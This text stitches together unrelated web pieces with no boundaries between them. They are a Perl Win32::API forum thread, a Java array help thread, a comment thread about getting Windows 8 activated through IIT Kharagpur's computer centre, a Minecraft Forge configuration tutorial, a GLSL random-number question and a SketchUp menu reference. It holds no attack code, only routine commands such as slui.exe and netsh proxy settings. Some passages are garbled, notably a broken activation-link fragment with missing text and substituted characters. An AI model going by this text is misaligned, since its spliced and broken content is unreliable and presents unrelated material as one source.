The second class is called the CXMLElement class. It is used by the previous class, and will be used by the developer when browsing or modifying the inner structure of an XML file in the system memory, that is, when modifying the inner structure of the XML element collection. It provides basic support for appending to this collection and browsing it. It can provide information regarding the name, type, or value of the current XML element from the collection.
CXMLElement
There are many articles on CodeProject covering this topic, and this is a small contribution to that collection. I hope that readers and developers will find it useful in their everyday work.
It's quite easy to load an XML document from the hard-disk. See an example below:
#include "XMLFile.h"
...
_TCHAR lpszXMLFilePath[] = _T("A path to the XML file here...");
CXMLFile xmlFile;
if (xmlFile.LoadFromFile(lpszXMLFilePath))
{
// Success
}
else
{
// Error
}
To load an XML document from the memory stream:
...
// lpData and dwDataSize are obtained elsewhere
CXMLFile xmlFile;
if (xmlFile.LoadFromStream(lpData, dwDataSize))
{
// Success
}
else
{
// Error
}
To save the XML element collection to the file on the hard-disk, do the following:
if (xmlFile.SaveToFile(lpszXMLFilePath))
{
// Success
}
else
{
// Error
}
After the call to LoadFromFile(), a method of the CXMLFile class, the validation and parsing of the custom XML file will be done. If the XML file is well-formed, it will be loaded into the system memory as a collection of CXMLElement elements. One can gain access to this collection using another method of the CXMLFile class called GetRoot(). See below:
LoadFromFile()
GetRoot()
CXMLElement* pRoot = xmlFile.GetRoot();
Having the pointer to the root element of the XML collection in the system memory, there are some things that can be done here. The root element of the collection is of the CXMLElement class type. Here are the methods available:
CXMLElement
// Returns the name of the current XML element
LPTSTR GetElementName();
// Returns the type of the current XML element
XML_ELEMENT_TYPE GetElementType();
// Returns the number of child elements of the current XML element
int GetChildNumber();
// Returns the first child element of the current XML element
CXMLElement* GetFirstChild();
// Returns the current child element of the current XML element
CXMLElement* GetCurrentChild();
// Returns the next child element of the current XML element
CXMLElement* GetNextChild();
// Returns the last child element of the current XML element
CXMLElement* GetLastChild();
// Sets the value of the current XML element (valid only for attribute elements)
void SetValue(LPTSTR lpszValue);
// Gets the value of the current XML element (valid only for attribute elements)
LPTSTR GetValue();
Modify the inner structure of the XML element collection using the following methods:
// Create the new XML element of the specified type
void Create(LPTSTR lpszElementName, XML_ELEMENT_TYPE type);
// Appends the new XML element to the end of the collection of the current XML element
void AppendChild(CXMLElement* lpXMLChild);
Using the first group of CXMLElement class methods, one can browse the XML element collection. Using the second group of CXMLElement class methods, one can create new XML elements of different types and append them to existing ones.
Speaking of the types of XML elements, they are listed here:
XET_TAG // TAG element
XET_ATTRIBUTE // ATTRIBUTE element
XET_TEXT // TEXT element
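To tie these pieces together, the following is a minimal browsing sketch using only the methods listed above. The exact iteration contract assumed here (GetFirstChild() followed by GetNextChild() until a NULL pointer is returned) is an assumption about this particular class rather than something stated explicitly in the article.

#include <stdio.h>
#include <tchar.h>
#include "XMLFile.h"

void DumpChildren(LPTSTR lpszXMLFilePath)
{
    CXMLFile xmlFile;
    if (!xmlFile.LoadFromFile(lpszXMLFilePath))
        return; // file missing or not well-formed

    CXMLElement* pRoot = xmlFile.GetRoot();
    if (pRoot == NULL)
        return;

    // Walk the immediate children of the root element.
    for (CXMLElement* pChild = pRoot->GetFirstChild(); pChild != NULL; pChild = pRoot->GetNextChild())
    {
        _tprintf(_T("element: %s\n"), pChild->GetElementName());
        if (pChild->GetElementType() == XET_ATTRIBUTE)
            _tprintf(_T("  value: %s\n"), pChild->GetValue());
    }
}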
I always had a problem with loading XML documents easily and manipulating them. Now, I have useful classes that decrease my future development time when this type of work is required. I am also able now to easily parse RSS feeds that are used all over the Web. I am planning to extend this basic support to HTML, or to XML documents that are not so well-formed, soon (when I find some more free time).
|
http://www.codeproject.com/Articles/24492/CXMLFile-A-Simple-C-XML-Parser?fid=1126460&df=90&mpp=10&sort=Position&spc=None&tid=4145442&PageFlow=FixedWidth
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
csMatrix3 Class Reference
A 3x3 matrix.
More...
[Geometry utilities]
#include <csgeom/matrix3.h>
Inheritance diagram for csMatrix3:
Detailed Description
A 3x3 matrix.
Definition at line 38 of file matrix3.h.
Constructor & Destructor Documentation
Construct a matrix from axis-angle specifier.
Member Function Documentation
Compute the determinant of this matrix.
Return the inverse of this matrix.
Definition at line 144 of file matrix3.h.
References m11, m21, and m31.
Referenced by csReversibleTransform::SetO2T(), and csReversibleTransform::SetT2O().
Return the transpose of this matrix.
Referenced by csOrthoTransform::SetO2T(), and csOrthoTransform::SetT2O().
Set this matrix to the identity matrix.
Check if the matrix is identity.
Multiply this matrix with a scalar.
Multiply another matrix with this matrix.
Add another matrix to this matrix.
Subtract another matrix from this matrix.
Divide this matrix by a scalar.
Initialize matrix with a quaternion.
Transpose this matrix.
Friends And Related Function Documentation
Multiply a matrix and a scalar.
Multiply a matrix and a scalar.
Multiply two matrices.
Check if two matrices are not equal.
Add two matrices.
Subtract two matrices.
Divide a matrix by a scalar.
Test if each component of a matrix is less than a small epsilon value.
Check if two matrices are equal.
Test if each component of a matrix is greater than a small epsilon value.
The documentation for this class was generated from the following file:
Generated for Crystal Space 1.0.2 by doxygen 1.4.7
|
http://www.crystalspace3d.org/docs/online/api-1.0/classcsMatrix3.html
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
System.Messaging Namespace
The System.Messaging namespace provides classes that allow you to connect to, monitor, and administer message queues on the network and send, receive, or peek messages.
Members of the MessageQueue class include the following methods for reading and writing messages to the queue:
The Send method enables your application to write messages to the queue. Overloads of the method enable you to specify whether to send your message using a Message (which provides detailed control over the information you send) or any other managed object, including application-specific classes. The method also supports sending messages as part of a transaction.
The Receive, ReceiveById, and ReceiveByCorrelationId methods provide functionality for reading messages from a queue. Like the Send method, these methods provide overloads that support transactional queue processing. These methods also provide overloads with time-out parameters that enable processing to continue if the queue is empty. Because these methods are examples of synchronous processing, they interrupt the current thread until a message is available, unless you specify a time-out.
The Peek method is similar to Receive, but it does not cause a message to be removed from the queue when it is read. Because Peek does not change the queue contents, there are no overloads to support transactional processing. However, because Peek, like Receive, reads messages synchronously from the queue, overloads of the method do support specifying a time-out in order to prevent the thread from waiting indefinitely.
The BeginPeek, EndPeek(IAsyncResult), BeginReceive, and EndReceive(IAsyncResult) methods provide ways to asynchronously read messages from the queue. They do not interrupt the current thread while waiting for a message to arrive in the queue.
The following methods of the MessageQueue class provide functionality for retrieving lists of queues by specified criteria and determining if specific queues exist:
GetPrivateQueuesByMachine(String) enables the retrieval of the private queues on a computer.
GetPublicQueuesByCategory(Guid), GetPublicQueuesByLabel(String), and GetPublicQueuesByMachine(String) provide ways to retrieve public queues by common criteria. An overload of GetPublicQueues provides even finer detail for selecting queues based on a number of search criteria.
Other methods of the MessageQueue class provide the following functionality:
Creating and deleting Message Queueing queues.
Using a message enumerator to step through the messages in a queue.
Using a queue enumerator for iterating through the queues on the system.
Setting ACL-based access rights.
Working with the connection cache.
The Message class provides detailed control over the information you send to a queue, and is the object used when receiving or peeking messages from a queue. Besides the message body, the properties of the Message class include acknowledgment settings, formatter selection, identification, authentication and encryption information, timestamps, indications about using tracing, server journaling, and dead-letter queues, and transaction data.
The MessageQueue component is associated with the following three formatters, which enable you to serialize and deserialize messages sent and received from queues:
The XmlMessageFormatter provides loosely coupled messaging, enabling independent versioning of serialized types on the client and server.
The ActiveXMessageFormatter is compatible with the MSMQ COM control. It allows you to send types that can be received by the control and to receive types that were sent by the control.
The BinaryMessageFormatter provides a faster alternative to the XmlMessageFormatter, but without the benefit of loosely coupled messaging.
Other classes in the Messaging namespace support code-access and ACL-based security, filtering Message properties when reading messages from a queue, and using transactions when sending and receiving messages.
|
http://msdn.microsoft.com/en-US/library/system.messaging(v=vs.90).aspx
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
Configuring Event Log Properties
Microsoft® Windows® 2000 Scripting Guide
Depending on the role played by a computer, you might need to change the default event log settings for that computer. If the default settings remain unchanged for all the computers in an organization, a domain controller that records thousands of events each day will be configured exactly the same as a workstation that records only 15 or 20 events a day. As a result, the domain controller might fail to record a number of important events, either because its event logs fill up too quickly or because some events might be overwritten before they can be archived.
Event log properties have typically been configured by means of the Event Viewer, a graphical user utility that has two major limitations: Event Viewer can configure only one event log on a single computer at a time, and Event Viewer cannot automate the process of configuring event logs. Because manually configuring event logs on an individual basis can be very time-consuming, administrators often leave the default settings as-is, even if those settings are not optimal for the roles played by certain computers. In turn, this means important events might not be recorded, or might be overwritten before they can be archived.
WMI enables you to write scripts that can programmatically configure event log properties. Two of the most important properties are shown in Table 12.3.
Table 12.3 Event Log Properties Configurable with WMI
When you reconfigure an event log, the changes you make do not take effect until the event log has been cleared. If you want the reconfiguration to take effect immediately, create your script to first reconfigure and then to back up and clear the event log.
Scripting Steps
Listing 12.4 contains a script that configures the maximum size and the overwrite policy for all the event logs on a computer. To carry out this task, the script must perform the following steps:
Create a constant named wbemFlagUseAmendedQualifiers and set the value to &h2000.
This constant is required when using the Put_ method to apply changes to an event log.
Create a variable to specify the computer name.
Use a GetObject call to connect to the WMI namespace root\cimv2, and set the impersonation level to "impersonate."
The Security privilege is included in the moniker so that the script can access all the event logs, including the Security event log.
Use the ExecQuery method to query the Win32_NTEventLogFile class. This returns a collection consisting of all the event logs on the computer.
Retrieve the name of the first event log in the connection.
Set the maximum log file size to 4 megabytes (4,194,304 bytes).
Set the overwrite policy so that all records older than 14 days are overwritten.
Use the Put_ method to write the changes to the event log. You must include the wbemFlagUseAmendedQualifiers flag, or the script will fail.
Repeat the process with the next event log in the collection.
Listing 12.4 Configuring Event Log Properties
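A minimal VBScript sketch along the lines of the steps above (this is not the book's original listing; the constant value, the 4 MB maximum size, and the 14-day overwrite policy follow the text, and MaxFileSize and OverWriteOutdated are the standard Win32_NTEventLogFile property names):

Const wbemFlagUseAmendedQualifiers = &h2000   ' value as given in the steps above

strComputer = "."
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate,(Security)}!\\" & _
    strComputer & "\root\cimv2")

Set colLogFiles = objWMIService.ExecQuery("SELECT * FROM Win32_NTEventLogFile")

For Each objLogFile In colLogFiles
    objLogFile.MaxFileSize = 4194304        ' 4 megabytes
    objLogFile.OverWriteOutdated = 14       ' overwrite records older than 14 days
    objLogFile.Put_ wbemFlagUseAmendedQualifiers
Next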
|
http://technet.microsoft.com/en-us/library/ee176701.aspx
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
WSDL Essentials, Page 2
WSDL Invocation Tools, Part II
Our initial discussion of WSDL invocation tools focused on programming and command-line invocation tools. We now move on to even simpler tools that are entirely driven by a web-based interface.
The GLUE Console
In addition to supporting a number of command-line tools, the GLUE platform also supports a very intuitive web interface for deploying new services and connecting to existing services.
console
This will automatically start the GLUE console on the default port 8100. Open a web browser and you will see the GLUE console home page. (See Figure 6-5.)
In the text box entitled WSDL, you can enter the URL for any WSDL file. For example, try entering the URL for the eBay Price Watcher Service.
Click the WSDL button, and you will see the Web Service overview page. (See Figure 6-6.) This page includes a description of the specified service (extracted from the WSDL documentation element) and a list of public operations. In the case of the eBay service, you should see a single getCurrentPrice method.
Click the getCurrentPrice method, and you will see the Web Method overview page. (See Figure 6-7.) This page includes a text box where you can specify the input auction ID.
Enter an auction ID, click the Send button, and GLUE will automatically invoke the remote method and display the results at the bottom of the page. For example, Figure 6-8 shows the current bid price for the Handspring Visor Deluxe. Note that the price has already gone up $10 since invoking the service via the GLUE command-line tool!
SOAPClient.com
If you would like to try out a web-based interface similar to GLUE, but don't want to bother downloading the GLUE package, consider the Generic SOAP Client available at SOAPClient.com.
Figure 6-9 shows the opening screen to the Generic SOAP Client. Much like the GLUE console, you can specify the address for a WSDL file in this screen.
Specify the same eBay Price Watcher Service WSDL file, and the SOAP Client will display a text box for entering the auction ID. (See Figure 6-10.)
Figure 6-11 displays the result of the eBay service invocation. The Handspring Visor is up another $4!
Automatically Generating WSDL Files
One of the best aspects of WSDL is that you rarely have to create WSDL files from scratch. A whole host of tools currently exists for transforming existing services into WSDL descriptions. You can then choose to use these WSDL files as is or manually tweak them with your favorite text editor. In the discussion that follows, we explore the WSDL generation tool provided by GLUE.
TIP: If you create WSDL files from scratch or tweak WSDL files generated by a tool, it is a good idea to validate your final WSDL documents. You can download a WSDL validator online. This package requires that you have an XSLT engine and the zvon Schematron, but installation only takes a few minutes. Once installed, the validator is well worth the effort and creates nicely formatted HTML reports indicating WSDL errors and warnings.
GLUE java2wsdl Tool
The GLUE platform includes a java2wsdl command-line tool for transforming Java services into WSDL descriptions. The command-line usage is as follows:
usage: java2wsdl <arguments>
where valid arguments are:
classname name of java class
-d directory output directory
-e url endpoint of service
-g include GET/POST binding
-m map-file read mapping instructions
-n namespace namespace for service
-r description description of service
-s include SOAP binding
-x command-file command file to execute
Complete information on each argument is available online in the GLUE User Guide. For now, we will focus on the most basic arguments.
For example, consider the PriceService class in Example 6-4. The service provides a single getPrice( ) method.
Example 6-4: PriceService.java
package com.ecerami.soap.examples;

import java.util.Hashtable;

/**
 * A Sample SOAP Service
 * Provides Current Price for requested Stockkeeping Unit (SKU)
 */
public class PriceService {
    protected Hashtable products;

    /**
     * Zero Argument Constructor
     * Load product database with two sample products
     */
    public PriceService ( ) {
        products = new Hashtable( );
        // Red Hat Linux
        products.put("A358185", new Double (54.99));
        // McAfee PGP Personal Privacy
        products.put("A358565", new Double (19.99));
    }

    /**
     * Provides Current Price for requested SKU
     * In a real-setup, this method would connect to
     * a price database. If SKU is not found, method
     * will throw a PriceException.
     */
    public double getPrice (String sku)
            throws ProductNotFoundException {
        Double price = (Double) products.get(sku);
        if (price == null) {
            throw new ProductNotFoundException ("SKU: "+sku+" not found");
        }
        return price.doubleValue( );
    }
}
To generate a WSDL file for this class, run the following command:
java2wsdl com.ecerami.soap.examples.PriceService -s -e: 8080/soap/servlet/rpcrouter -n urn:examples:priceservice
The -s option directs GLUE to create a SOAP binding; the -e option specifies the address of our service; and the -n option specifies the namespace URN for the service. GLUE will generate a PriceService.wsdl file. (See Example 6-5.)
TIP: If your service is defined via a Java interface and you include your source files within your CLASSPATH, GLUE will extract your Javadoc comments and turn these into WSDL documentation elements.
Example 6-5: PriceService.wsdl (automatically generated by GLUE)
<?xml version='1.0' encoding='UTF-8'?>
<!--generated by GLUE-->
<definitions name='com.ecerami.soap.examples.PriceService'
targetNamespace='.
examples.PriceService/'
xmlns:tns='.
examples.PriceService/'
xmlns:electric=''
xmlns:soap=''
xmlns:http=''
xmlns:mime=''
xmlns:xsd=''
xmlns:soapenc=''
xmlns:
<message name='getPrice0SoapIn'>
<part name='sku' type='xsd:string'/>
<message name='getPrice0SoapOut'>
<part name='Result' type='xsd:double'/>
<portType name='com.ecerami.soap.examples.PriceServiceSoap'>
<operation name='getPrice' parameterOrder='sku'>
<input name='getPrice0SoapIn' message='tns:getPrice0SoapIn'/>
<output name='getPrice0SoapOut' message='tns:getPrice0SoapOut'/>
</operation>
</portType>
<binding name='com.ecerami.soap.examples.PriceServiceSoap'
type='tns:com.ecerami.soap.examples.PriceServiceSoap'>
<soap:binding
<operation name='getPrice'>
<soap:operation
<input name='getPrice0SoapIn'>
<soap:body
</input>
<output name='getPrice0SoapOut'>
<soap:body
</output>
</operation>
</binding>
<service name='com.ecerami.soap.examples.PriceService'>
<port name='com.ecerami.soap.examples.PriceServiceSoap'
binding='tns:com.ecerami.soap.examples.PriceServiceSoap'>
<soap:address location='
/soap/servlet/ rpcrouter'/>
</port>
</service>
</definitions>
You can then invoke the service via SOAP::Lite:
use SOAP::Lite;
print "Connecting to Price Service...\n";
print SOAP::Lite
-> service('')
-> getPrice ('A358185');
Hopefully, this example illustrates the great promise of web service interoperability. We have a WSDL file generated by GLUE, a server running Java, and a client running Perl, and they all work seamlessly together.
Connecting to Price Service...
54.99
WARNING: The IBM Web Services Toolkit (available at) provides a WSDL generation tool called wsdlgen. This tool can take existing Java classes, Enterprise JavaBeans, and Microsoft COM objects and automatically generate corresponding WSDL files. However, as this book goes to press, the wsdlgen tool creates files based on the 1999 version of the W3C XML Schema. The WSDL files are therefore incompatible with other WSDL invocation tools, such as SOAP::Lite and GLUE. If you choose to use the IBM tool, make sure to manually update your WSDL files to reflect the latest version of XML Schema ().
Magic methods
For starters, let's take a look at the magic methods PHP provides. We will first go over the non-overloading methods.
__construct and __destruct
class SomeClass {
public function __construct() {
}
public function __destruct() {
}
}
The most common magic method in PHP is __construct. In fact, you might not even have thought of it as a magic method at all, as it's so common. __construct is the class constructor method, which gets called when you instantiate a new object using the new keyword, and any parameters used will get passed to __construct.
$obj = new SomeClass();
__destruct is __construct's "pair". It is a class destructor, which is rarely used in PHP, but still it is good to know about its existence. It gets called when your object falls out of scope or is garbage collected.
function someFunc() {
$obj = new SomeClass();
//when the function ends, $obj falls out of scope and SomeClass __destruct is called
}
someFunc();
If you make the constructor private or protected, it means that the class cannot be instantiated, except inside a method of the same class. You can use this to your advantage, for example to create a singleton.
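For illustration, here's a minimal sketch of that singleton idea; the class name and property are invented for this example:
class Database {
    private static $instance = null;

    // A private constructor means new Database() only works inside the class
    private function __construct() {
    }

    public static function getInstance() {
        if (self::$instance === null) {
            self::$instance = new Database();
        }
        return self::$instance;
    }
}

$db = Database::getInstance(); // always returns the same instance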
__clone
class SomeClass {
    public $someValue;

    public function __clone() {
        // PHP has already made a shallow copy of the object at this point;
        // adjust the copy's properties here if needed. The return value is ignored.
    }
}
The __clone method is called when you use PHP's clone keyword. PHP first makes a shallow copy of the object and then calls __clone on that copy, so by implementing __clone you can define how the copy should be adjusted (for example, deep-copying nested objects); the method's return value is ignored.
$obj1 = new SomeClass();
$obj1->someValue = 1;
$obj2 = clone $obj1;
echo $obj2->someValue;
//echos 1
Important: __clone is not the same as =. If you use = to assign an object to another variable, the other variable will still refer to the same object as the first one! If you use the clone keyword, the purpose is to return a new object with similar state as the original. Consider the following:
$obj1 = new SomeClass();
$obj1->someValue = 1;
$obj2 = $obj1;
$obj3 = clone $obj1;
$obj1->someValue = 2;
What are the values of the someValue property in $obj2 and $obj3 now? As we have used the assign operator to create $obj2, it refers to the same object as $obj1, thus $obj2->someValue is 2. When creating $obj3, we have used the clone keyword, so the __clone method was called. As __clone creates a new instance, $obj3->someValue is still the same as it was when we cloned $obj1: 1.
If you want to disable cloning, you can make __clone private or protected.
__toString
class SomeClass {
public function __toString() {
return 'someclass';
}
}
The __toString method is called when PHP needs to convert class instances into strings, for example when echoing:
$obj = new SomeClass();
echo $obj;
//will output 'someclass'
This can be useful, for example, to help you identify objects or when creating lists. If we have a user object, we could define a __toString method which outputs the user's first and last names, and when we want to create a list of users, we could simply echo the objects themselves.
__sleep and __wakeup
class SomeClass {
private $_someVar;
public function __sleep() {
return array('_someVar');
}
public function __wakeup() {
}
}
These two methods are used with PHP's serializer: __sleep is called with serialize(), __wakeup is called with unserialize(). Note that you will need to return an array of the class variables you want to save from __sleep. That's why the example class returns an array with _someVar in it: Without it, the variable will not get serialized.
$obj = new SomeClass();
$serialized = serialize($obj);
//__sleep was called
unserialize($serialized);
//__wakeup was called
You typically won't need to implement __sleep and __wakeup, as the default implementation will serialize classes correctly. However, in some special cases it can be useful. For example, if your class stores a reference to a PDO object, you will need to implement __sleep, as PDO objects cannot be serialized.
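As a rough sketch of that PDO case (the class, property names, and DSN are invented for the example), __sleep can skip the connection and __wakeup can rebuild it:
class UserRepository {
    private $pdo;
    private $dsn = 'sqlite::memory:'; // hypothetical connection string

    public function __construct() {
        $this->pdo = new PDO($this->dsn);
    }

    public function __sleep() {
        // Only the DSN is serialized; the PDO handle cannot be
        return array('dsn');
    }

    public function __wakeup() {
        // Re-create the connection when the object is unserialized
        $this->pdo = new PDO($this->dsn);
    }
}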
As with most other methods, you can make __sleep private or protected to stop serialization. Alternatively, you can throw an exception, which may be a better idea as you can provide a more meaningful error message.
An alternative to __sleep and __wakeup is the Serializable interface. However, as its behavior is different from these two methods, the interface is outside the scope of this article. You can find info on it in the PHP manual.
__set_state
class SomeClass {
public $someVar;
public static function __set_state($state) {
$obj = new SomeClass();
$obj->someVar = $state['someVar'];
return $obj;
}
}
This method is called in code created by var_export. It gets an array as its parameter, which contains a key and value for each of the class variables, and it must return an instance of the class.
$obj = new SomeClass();
$obj->someVar = 'my value';
var_export($obj);
This code will output something along the lines of:
SomeClass::__set_state(array('someVar'=>'my value'));
Note that var_export will also export private and protected variables of the class, so they too will be in the array.
Overloading methods
Now that we've gone through all the non-overloading methods, we can move to the overloading ones.
If you define an overloading magic method, they all have some behavior that's important to know before using them. They only apply to methods and variables that are inaccessible:
- methods or variables that do not exist at all
- variables which are outside the scope
Basically, this means that if you have a public member foo, overloading methods will not get called when you attempt to access it. If you attempt to access member bar, which does not exist, they will.
Also, if you declare a private/protected variable $hiddenVar, and attempt to access it outside the class' own methods, the overloading methods will get called. This applies to classes which inherit the original— any attempt to access the parent's private variables will result in overloading method calls.
__call
class SomeClass {
public function __call($method, $parameters) {
}
}
This magic method is called when the code attempts to call a method which does not exist. It takes two parameters: the method name that was being called, and any parameters that were passed in the call.
$obj = new SomeClass();
$obj->missingMethod('Hello');
//__call is called, with 'missingMethod' as the first parameter and
//array('Hello') as the second parameter
This can be used to implement all kinds of useful things. For example, you can use __call to create automatic getter methods for variables in your class:
class GetterClass {
    private $_data = array(
        'foo' => 'bar',
        'bar' => 'foo'
    );

    public function __call($method, $params) {
        if(substr($method, 0, 3) == 'get') {
            //Change the latter part of the method name to lowercase
            //so that it matches the keys in the data array
            return $this->_data[strtolower(substr($method, 3))];
        }
    }
}
$obj = new GetterClass();
echo $obj->getBar();
//output: foo
You could also use this to emulate mixins. By storing mixin classes inside a variable in the class, you could use __call to check each of them for a method that's not in the main class.
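A minimal sketch of that mixin idea might look like this (Logger and Service are invented names):
class Logger {
    public function log($message) {
        echo $message . "\n";
    }
}

class Service {
    private $mixins = array();

    public function addMixin($object) {
        $this->mixins[] = $object;
    }

    public function __call($method, $params) {
        // Look for the missing method in each mixin object
        foreach ($this->mixins as $mixin) {
            if (method_exists($mixin, $method)) {
                return call_user_func_array(array($mixin, $method), $params);
            }
        }
        throw new Exception("Method $method does not exist");
    }
}

$service = new Service();
$service->addMixin(new Logger());
$service->log('Hello from a mixin'); // handled by __call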
If you implement __call, any call to a method which does not exist will go into it. You should always throw an exception at the end of __call if the method was not handled. This helps prevent bugs that can occur when you mistype a method name and the call goes into __call, which could otherwise silently ignore it.
If you, for some reason, want to create a method with a PHP reserved word as its name, you can fake one using __call. For example, normally you can't have a method called "function" or "class", but with __call it's possible.
__get and __set
class SomeClass {
public function __get($name) {
}
public function __set($name, $value) {
}
}
The __get and __set pair is called when attempting to read or write inaccessible variables, for example:
$obj = new SomeClass();
$obj->badVar = 'hello';
//__set is called with 'badVar' as first parameter and 'hello' as second parameter
echo $obj->otherBadVar;
//__get is called with 'otherBadVar' as the first parameter
__get works similarly to __call, in that you can return a value from it. If you don't return a value from __get, the value is assumed to be null.
These two can be used, for example, to create read-only variables, or C#-style properties which run some code when being read or written.
class PropertyClass {
    private $_foo;

    public function setFoo($value) {
        //some code here
        $this->_foo = $value;
    }

    public function getFoo() {
        return $this->_foo;
    }

    public function __set($name, $value) {
        $setter = 'set' . ucfirst($name);
        $this->$setter($value);
    }

    public function __get($name) {
        $getter = 'get' . ucfirst($name);
        return $this->$getter();
    }
}

$obj = new PropertyClass();
//Since foo does not exist, __set is called, and
//__set then calls setFoo which can run additional code
$obj->foo = 'something';
Like __call, it's important that you throw an exception if you don't handle a variable in __get or __set. Again, this will help prevent bugs that are caused by misspelled variable names.
__unset and __isset
class SomeClass {
public function __isset($name) {
}
public function __unset($name) {
}
}
If you want to use __get and __set, it's often useful to also implement __unset and __isset. They are called with unset and isset respectively:
$obj = new SomeClass();
isset($obj->someVar);
//calls __isset with 'someVar'
unset($obj->otherVar);
//calls __unset with 'otherVar'
Words of warning about magic methods
While it's possible to do fun things with magic methods, like making variable assignment actually call methods, or even completely nonsensical things like making unset($obj->foo) echo the value of $foo, keep in mind that it's easy to go overboard and end up with code that's harder to maintain because it's confusing.
Magic functions
This topic should probably be just called "magic function", since at the moment there is only one.
__autoload
You can define a function called __autoload to implement a default autoloader. Normally you would need to call spl_autoload_register to register any autoloader functions or methods, but not with __autoload.
function __autoload($class) {
require_once $class . '.php';
}
$obj = new SomeClass();
//assuming SomeClass isn't defined anywhere in the code,
//the __autoload function is now called with 'SomeClass' as its parameter
If you have more complex autoloading logic, you may want to just implement it as a class, similar to Zend_Loader in the Zend Framework, and then register the autoloader method manually with spl_autoload_register or a special method of the class.
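A bare-bones version of such an autoloader class could look like the following sketch (the directory layout and class name are assumptions):
class ClassLoader {
    private $baseDir;

    public function __construct($baseDir) {
        $this->baseDir = rtrim($baseDir, '/') . '/';
    }

    public function register() {
        spl_autoload_register(array($this, 'loadClass'));
    }

    public function loadClass($class) {
        // Assumes one class per file, named after the class
        $file = $this->baseDir . $class . '.php';
        if (is_file($file)) {
            require_once $file;
        }
    }
}

$loader = new ClassLoader('lib');
$loader->register();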
Magic constants
Magic constants are special predefined constants in PHP. Unlike other predefined constants, magic constants have a different value depending on where you use them. All of them use a similar naming style: __NAME__ - that is, two underscores, name in upper case, and then two more underscores.
Here are all the magic constants:
- __LINE__ - the current line number of the file
- __FILE__ - the full path and filename of the file
- __FUNCTION__ - the current function name
- __CLASS__ - the current class name
- __METHOD__ - the current class method name, prefixed with the class name
- __COMPILER_HALT_OFFSET__ - the offset in the file where __halt_compiler() was called
You can use __FUNCTION__ inside class methods. In this case, it will return just the method's name, unlike __METHOD__, which will always return the name with class name prefixed.
These constants are mainly useful for using as details in error message, and to assist in debugging. However, there are a few other uses as well.
Here's an example of throwing an exception with magic constants in the message: throw new Exception('Error in file ' . __FILE__ . ' on line ' . __LINE__);
It's worth noting that exception backtraces already come with the file and line.
__FILE__ can be used to get the current script's directory:
dirname(__FILE__);
With __CLASS__, it's possible to determine a parent class' name. (Since "parent" itself is a reserved word in PHP and can't be used as a class name, the example classes are called ParentClass and ChildClass.)
class ParentClass {
    public function someMethod() {
        echo __CLASS__;
    }
}

class ChildClass extends ParentClass {
}

$obj = new ChildClass();
$obj->someMethod();
//Will output: ParentClass
Finally, the more special __COMPILER_HALT_OFFSET__ can only be used when a file contains a call to __halt_compiler(). This is a special PHP function, which will end the compiling of the file at the point where the function is called. Any data after this will be ignored. You could use this, for example, to store some additional data. You can then read this data by reading the current file, and looking at __COMPILER_HALT_OFFSET__. The usage of this approach is outside the scope of this article, so check the PHP manual for more details.
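To give a rough idea of how this works, here is a small self-contained sketch; the data stored after __halt_compiler() is just example text:
<?php
// Read everything stored after the __halt_compiler() call in this file
$fp = fopen(__FILE__, 'r');
fseek($fp, __COMPILER_HALT_OFFSET__);
echo stream_get_contents($fp);
fclose($fp);

__halt_compiler();
This text is never parsed by PHP, but the code above can read it as data.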
PHP 5.3 magic features
Lastly, let us check out what new magic methods and constants PHP 5.3 brings to the table!
New magic methods in PHP 5.3
PHP 5.3 adds two new magic methods: __invoke and __callStatic.
class NewMethodsClass {
public static function __callStatic($method, $parameters) {
}
public function __invoke($parameters) {
}
}
__callStatic is the same as __call, except it's used in static context:
NewMethodsClass::someStaticMethod('Hi');
//calls __callStatic with 'someStaticMethod' and array('Hi')
As with __call, remember to throw an exception if you don't handle some method in __callStatic, so that you prevent any bugs that are caused by mistyped method names.
__invoke is more interesting: it gets called when you use a class instance like a function
$obj = new NewMethodsClass();
$obj('Hi');
//calls __invoke with 'Hi'
This could be useful for implementing the command pattern, or to create something similar to the Runnable or Callable interfaces in Java.
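A small sketch of the command pattern idea (PrintCommand is an invented class):
class PrintCommand {
    private $message;

    public function __construct($message) {
        $this->message = $message;
    }

    public function __invoke() {
        echo $this->message . "\n";
    }
}

$commands = array(
    new PrintCommand('first task'),
    new PrintCommand('second task'),
);

foreach ($commands as $command) {
    $command(); // each object is "run" like a function via __invoke
}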
New magic constants in PHP 5.3
PHP 5.3 adds two new magic constants: __DIR__ and __NAMESPACE__
__DIR__ is the same as calling dirname(__FILE__)
__NAMESPACE__ contains the current namespace, which is a new feature of PHP 5.3.
New magic functions in PHP 5.3
PHP 5.3 does not add any new magic functions.
Summary
PHP contains magic methods, magic constants and a magic function, which are special features of the PHP language and can be used for various purposes. They are some of the features that make PHP stand out from the crowd, as not many other languages provide similar capabilities, and as such, any serious PHP programmer should know them.
About the Author :
Jani Hartikainen
Jani Hartikainen is a Finnish web developer. He has been programming in PHP for over 6 years, and is also skilled in various other technologies such as JavaScript, C# and Python. Visit his programming blog at.
Dear Perl Monks,
I need a help in Win32::API
I am working on a hardware test automation, The interface to hardware is USB-I2C and we have a C DLL which exports set of functions to communicate with hardware.
I am trying to import the C DLL via the Win32::API module so I can automate some test cases via Perl. Right now, I am able to read & write to a particular memory address using the exported APIs in the DLL.
I have a problem with one API, i2cGetDeviceAddress, which returns unsigned char. I have not been able to properly use Win32::API to get the data from this API. The API works fine in C code.
I have given API prototype in C , C code and its output and my perl code
Please help me to use 'unsigned char' with Win32::API module.
use Win32::API;

# C prototype
# typedef unsigned char __stdcall i2cGetDeviceAddress_type();
# extern i2cGetDeviceAddress_type *i2cGetDeviceAddress;

# C++ prototype
# extern "C" Byte __stdcall i2cGetDeviceAddress(void);

# C code
# printf ("\n \n DEV: %d , %c , %x ", i2cGetDeviceAddress(), i2cGetDeviceAddress(), i2cGetDeviceAddress());
#
# Output: DEV: 70 , F , 46

# Perl code
# When I use 'char' as a return type, the API is not returning anything:
# my $i2cGetDeviceAddressFunc = Win32::API->new('CrdI2C32', 'char i2cGetDeviceAddress()')
#     or warn "\n ERROR: Can not import API:i2cGetDeviceAddress , $^E ,";
# When I use 'unsigned char' as a return type, I get:
#     Win32::API::parse_prototype: WARNING unknown output parameter type 'unsigned'
# my $i2cGetDeviceAddressFunc = Win32::API->new('CrdI2C32', 'unsigned char i2cGetDeviceAddress()')
